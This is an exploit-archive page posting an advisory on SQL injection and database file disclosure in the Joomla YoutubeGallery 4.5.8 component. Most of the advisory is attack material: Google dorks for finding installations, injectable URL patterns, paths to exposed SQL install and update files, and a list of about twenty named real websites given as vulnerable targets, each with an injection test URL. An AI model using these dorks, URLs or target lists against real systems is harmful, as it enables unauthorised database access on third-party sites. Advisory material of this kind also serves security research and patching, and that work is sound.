exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla YoutubeGallery 4.5.8 Database Disclosure / SQL Injection

Joomla YoutubeGallery 4.5.8 Database Disclosure / SQL Injection
Posted Jan 17, 2019
Authored by KingSkrupellos

Joomla YoutubeGallery component version 4.5.8 suffers from database disclosure and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, info disclosure
SHA-256 | 624e2aa64393201647ae1ea75556b294f62a6a7183e66b36fff793f579efde03

Joomla YoutubeGallery 4.5.8 Database Disclosure / SQL Injection

Change Mirror Download
########################################################################################

# Exploit Title : Joomla YoutubeGallery Components 4.5.8 Database
Disclosure and SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : joomlaboat.com
# Software Information Links :
extensions.joomla.org/extension/youtube-gallery/
joomlaboat.com/en/youtube-gallery
# Software Download Link :
joomlaboat.com/images/extensions/youtubegallery_free_4.5.8.zip
# Software Vulnerable Source Codes :
github.com/joomlagovbr/joomla-3.x/tree/master/administrator/components/com_youtubegallery/sql/updates/mysql
github.com/joomlagovbr/joomla-3.x/tree/master/administrator/components/com_youtubegallery/sql
# Software Affected Versions : 4.5.8 and previous versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_youtubegallery''
inurl:''/administrator/components/com_youtubegallery/''
# Previous Version : 4.1.7 CVE Details =>
nvd.nist.gov/vuln/detail/CVE-2014-4960 - cvedetails.com/cve/CVE-2014-4960/
# CVE : CVE-2014-4960
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command
('SQL Injection') ]

########################################################################################

# SQL Injection Exploit :
**********************

/index.php?option=com_youtubegallery&view=gallery&layout=custom&Itemid=[SQL
Injection]

/index.php?option=com_youtubegallery&view=gallery&Itemid=[SQL Injection]

/index.php?option=com_youtubegallery&view=gallery&Itemid=[ID-NUMBER]&videoid=[SQL
Injection]

/index.php?option=com_youtubegallery&view=youtubegallery&Itemid=
[ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]=[SQL Injection]

/index.php?option=com_youtubegallery&view=gallery&Itemid=
[ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&lang=[SQL Injection]

/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=
[ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&tmpl=[SQL Injection]

/index.php?option=com_youtubegallery&view=youtubegallery&Itemid=
[ID-NUMBER]&galleryid=[ID-NUMBER]&videoid=[SQL Injection]

/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=
[ID-NUMBER]&defaultvideo=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_youtubegallery&view=youtubegallery&listid=
[ID-NUMBER]&themeid=[ID-NUMBER]'&videoid=
[YOUTUBE-VIDEO-ID-NUMBER]&tmpl=component&TB_iframe=
true&height=[ID-NUMBER]&width=[SQL Injection]

########################################################################################

# Database Disclosure Exploit :
***************************

/administrator/components/com_youtubegallery/sql/install.mysql.utf8.sql
/administrator/components/com_youtubegallery/sql/uninstall.mysql.utf8.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/0.0.1.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.2.1.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.2.2.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.2.3.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.2.5.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.3.3.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.3.5.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.3.6.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/1.3.7.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.0.0.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.1.0.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.1.3.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.1.4.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.2.0.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.2.7.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.2.9.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/2.3.0.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.0.0.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.0.6.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.1.3.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.1.5.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.1.8.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.2.4.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.2.7.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.3.6.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.3.7.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.3.9.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.4.8.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.5.7.sql
/administrator/components/com_youtubegallery/sql/updates/mysql/3.5.8.sql

########################################################################################

# Example Vulnerable Sites :
*************************

[+]
terrabit.com.br/cmfp/administrator/components/com_youtubegallery/sql/install.mysql.utf8.sql

[+]
jfkleinheidorn.de/administrator/components/com_youtubegallery/sql/updates/mysql/2.1.3.sql

[+]
ceensac.com/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=1&Itemid=266%27
=>

[ Proof of Concept for SQL Injection ] => archive.is/VXqiB

[+]
newyddwelshcobs.co.uk/index.php?option=com_youtubegallery&view=gallery&Itemid=48&videoid=1%27

[+]
medealabperu.com/senscience/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=1&videoid=82X2hj53r2I&tmpl=1%27

[+]
praiamotor.com.br/index.php?option=com_youtubegallery&view=gallery&Itemid=37%27

[+]
ncd.org.jo/index.php?option=com_youtubegallery&view=gallery&Itemid=128%27

[+]
nazarethchurchnotethnic.org/index.php?option=com_youtubegallery&view=youtubegallery&Itemid=216&galleryid=1&videoid=1%27

[+]
aakashgupta.com/index.php?option=com_youtubegallery&view=gallery&layout=custom&Itemid=113%27

[+]
mindthekids.com.co/index.php?option=com_youtubegallery&view=gallery&Itemid=95&videoid=1%27

[+]
ourtransition.info/index.php?option=com_youtubegallery&view=gallery&Itemid=6%27

[+]
ventzimartinov.com/index.php?option=com_youtubegallery&view=gallery&Itemid=56&videoid=u-OtHblFgkc&lang=1%27

[+]
ponowa48.pl/index.php?option=com_youtubegallery&view=gallery&Itemid=114%27

[+]
srisaidarshan.org/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=22%27

[+]
carpmachine.at/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=1&Itemid=140
'

[+]
ondazul.org.br/site/index.php?option=com_youtubegallery&view=gallery&Itemid=73
'

[+]
hitech-stroy.ck.ua/index.php?option=com_youtubegallery&view=gallery&Itemid=4
'

[+]
hundesport-gersdorf.de/index.php?option=com_youtubegallery&view=youtubegallery&Itemid=158&videoid=P833hFQoB4A=1%27

[+]
jamesallenclark.com/index.php?option=com_youtubegallery&view=gallery&Itemid=57
'

########################################################################################

# Example SQL Database Error :

Strict Standards: Only variables should be assigned by reference in
/home/medealab/public_html/senscience/plugins/system/rokbox/rokbox.php on
line 51

Deprecated: Non-static method VideoSource_YouTube::extractYouTubeID()
should not be
called statically, assuming $this from incompatible context in
/home/medealab
/public_html/senscience/components/com_youtubegallery/includes/misc.php on
line 198

Warning: DOMDocument::load(
http://gdata.youtube.com/feeds/api/videos/RLz2k-oAhPo)
[domdocument.load]: failed to open stream: HTTP request failed! HTTP/1.0 410
Gone in /usr/home/gurjiysp/data/www/hitech-stroy.ck.ua/components
/com_youtubegallery/models/gallery.php on line 145

########################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

########################################################################################
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close